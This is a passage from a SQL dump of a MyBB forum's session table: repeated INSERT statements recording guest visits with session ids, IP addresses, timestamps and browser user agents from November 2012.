'1352772612', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('45d30ead10fcce64bde737de41566278', '0', '41.193.7.42', '1352772613', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a7bf6feac80cb0e5e497edb038c85ed8', '0', '123.235.61.15', '1352772613', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('38e8d97f4b1b92793159bc74fda5505f', '0', '169.126.191.206', '1352772614', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e7528e2e8a8f3952f4e87874a8c0b5c7', '0', '209.144.25.151', '1352772614', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('890d7391fd44010b5048961c0a4bb357', '0', '115.57.188.30', '1352772615', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('3318b465cbeb2a90754f2fc19dc84e6c', '0', '196.2.248.74', '1352772616', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('88dd525703c5ba04f83777864d8cb4b6', '0', '40.115.18.130', '1352772617', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a4b72fbfe02a224a34f8fea431468d3d', '0', '6.104.238.43', '1352772617', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d5d537247b293932575c4ed724ce7836', '0', '250.228.209.129', '1352772618', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0e2579b8fe42eb2e6993c88722959feb', '0', '116.48.229.246', '1352772619', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('acd0d4c08bbcd6acec7a3ac9f8462bbc', '0', '151.243.137.12', '1352772620', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d97b9642d6c23f89390f55fdde37108c', '0', '73.73.219.121', '1352772620', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('360dc0e4265dea97a029fcb286160d4f', '0', '179.137.156.177', '1352772621', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0592924e9c3b37c58a2d5e97d8f6d1df', '0', '56.144.72.195', '1352772622', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1be73a0b28af5226926e10f1ead093ce', '0', '107.37.112.25', '1352772622', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('18168fc64f475b22ee3b1e94387853fb', '0', '64.226.51.78', '1352772623', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('74781cf632d18d4687a16636c379a84d', '0', '192.170.95.248', '1352772624', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6f757d438ffcc4bde3abf365486cc7f4', '0', '183.49.142.76', '1352772624', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c2fa89492b9f73aa753946372a2dd0bf', '0', '91.149.246.203', '1352772625', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c31e20f5dd459167ac4a4bfba3eebcfd', '0', '53.136.54.151', '1352772626', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f4bd69f115dd5ec5f850c0a1f00788fb', '0', '64.5.222.220', '1352772627', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('193f72652cff6ead9599a03ee063b35f', '0', '102.238.108.167', '1352772627', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('df799852be1e9bb4ae06c0b911d18b9f', '0', '155.212.130.140', '1352772628', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0e9b76bc43c89fd01196c93b6fd9027f', '0', '11.218.128.254', '1352772629', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9cfa4454e39fb82f0f99e2eb6bb025e6', '0', '45.205.212.20', '1352772629', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e0d004c020a8508817b422ea3819ec27', '0', '115.139.39.25', '1352772630', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('be12d32b48f4b57777fe540099c16e6e', '0', '87.29.232.35', '1352772631', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f887c1304423f6e3480ca89f345ef574', '0', '227.173.188.105', '1352772632', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f2b8dbca5c9a43299ddc9868bf1baacd', '0', '31.186.173.47', '1352772632', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f7c31507510577b970bb6c4d0c7d16cd', '0', '203.35.166.40', '1352772633', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c5ef525d9641b0d74df3e1ae4d2d0b38', '0', '231.199.71.73', '1352772634', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('bc9213748ee08f422fb92da42a6b7846', '0', '39.29.138.121', '1352772635', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2b698dd8909c45c6c06773849173a133', '0', '70.241.152.130', '1352772636', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e8227e695ad682265d57ab9731b6903c', '0', '220.108.98.132', '1352772640', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d93786983215887811fbdfd8ec8adfc5', '0', '240.238.192.117', '1352772644', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('24c8dd4abc4acfee21a20d5d20489575', '0', '24.212.197.164', '1352812752', '/member.php?&amp;action=do_login', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.1', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('346791c00c9151b121c16c2fcb0e8816', '0', '181.30.19.210', '1352772652', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('4e251a9ae8025dadbfd5c56237a88bfc', '0', '250.44.154.253', '1352772816', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c578c74f5fe6d6261aa2e6b7573f1f73', '0', '79.32.22.12', '1352772660', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('e1d74d19153446307dbfb13cea00c560', '0', '172.130.158.187', '1352772663', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('ca599566acb3ad84c0742aa4465cd361', '0', '150.94.60.190', '1352772664', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d1fd4ad6ddfdabb7c07042fd8cdc387d', '0', '123.240.196.104', '1352772665', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('b307e458b277181074727c6712b2eeb3', '0', '36.184.132.251', '1352772666', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('728d965fecbd65f109c3c49d1152ecaa', '0', '153.150.88.119', '1352772666', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c64e53f7efae59139b9ee3d3ee68f4c1', '0', '151.213.97.210', '1352772667', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('d7ec3ad9b7bc310d47d78617e0fb3f5d', '0', '119.74.212.146', '1352772668', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fc40eabcab793155f8a2c78169c6c7d9', '0', '24.134.2.39', '1352772669', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5a55b355334b61463fa9a202e679c836', '0', '51.185.91.96', '1352772669', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('5c0bc41fa01fed6ceaf62c57486c8360', '0', '179.145.65.211', '1352772670', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('0e1674ca7aa5e8e5c5eb8b5c8055fc2a', '0', '120.207.229.143', '1352772671', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('c910a08e132c26bade67a8d7f823da10', '0', '99.105.136.41', '1352772673', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('44e4da23f94f458bebd5f6be4ad29029', '0', '168.251.147.146', '1352772674', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('79d9369b9680daefd7487b65e4647adb', '0', '233.70.33.150', '1352772675', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('530b8a57b6f521bc18295f762721f577', '0', '240.229.95.25', '1352772676', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9be28633f84ac3f8cc9b69a47ba60128', '0', '217.96.68.47', '1352772677', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('f022097c1d0861fa95bf56856096216b', '0', '111.120.9.62', '1352772678', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('645a91d7d176e31c665f2396c8139747', '0', '105.195.169.141', '1352772680', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('816e2facc53f81d0d7cb39bf0372b43d', '0', '214.225.86.252', '1352772681', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('00de5a5e0d52a178a922ed732cb31193', '0', '141.188.228.70', '1352772682', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('fb4ac9eda3c8728ff9786ab223c05c16', '0', '232.16.251.31', '1352772683', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('841cde749828b1ed491da7fb00f811d2', '0', '30.227.94.251', '1352772684', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('878f8200498debe70e7e7a11a1578fb6', '0', '179.132.139.188', '1352772685', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('912acb1b981afadab0f2e21cf12a1324', '0', '190.184.99.163', '1352772686', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('738e9239f7f8ebd28837a7e8bf49fe14', '0', '15.145.215.220', '1352772687', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a14608cfa36dcd54b4136e5bf1668bd0', '0', '242.234.96.13', '1352772688', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('6d4aa00e1ede497c9260277c69597fa9', '0', '128.149.210.135', '1352772689', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('a7c56ccbd6823fafd1b7b6b74f6c3e9f', '0', '180.74.246.15', '1352772690', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('175914454cd6870ae0e25c456429683f', '0', '101.19.44.3', '1352772690', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('271614c3257fb80a79b27a1f87c9d362', '0', '93.165.226.243', '1352772691', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1d053443867eb9f5763249d645cb0fe5', '0', '80.5.89.123', '1352772692', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9eaea7bb5adfa965bc558796657f583f', '0', '89.193.109.53', '1352772693', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('40f637d763618ffb7ea0d6e714297780', '0', '128.218.147.103', '1352772694', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('93d796a58982b6126ea71e72e188d04f', '0', '206.249.167.225', '1352772694', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('1ccc06cff9deb68dea3e66e122352233', '0', '39.173.189.222', '1352772695', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('14d9d90579bca96602a2528bdce592c0', '0', '218.169.182.240', '1352772696', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('9a45ff3e7ae159e13bc870d85d94deed', '0', '214.182.104.6', '1352772697', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('29da41dccf85c14d8f48d420b3f0f380', '0', '74.116.10.40', '1352772698', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('01f1e76850a1df575cb316b48596f5f9', '0', '3.206.208.240', '1352772699', '/index.php?', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0', '0', '0', '0', '0'); INSERT INTO `mybb_sessions` (`sid`, `uid`, `ip`, `time`, `location`, `useragent`, `anonymous`, `nopermission`, `location1`, `location2`) VALUES ('2c2550ec39948ca41bfd8f9281bb693b', '0', '56.100.63.230', '1352772699', '/index.php?', 'Mozilla/5.0 (Windows NT 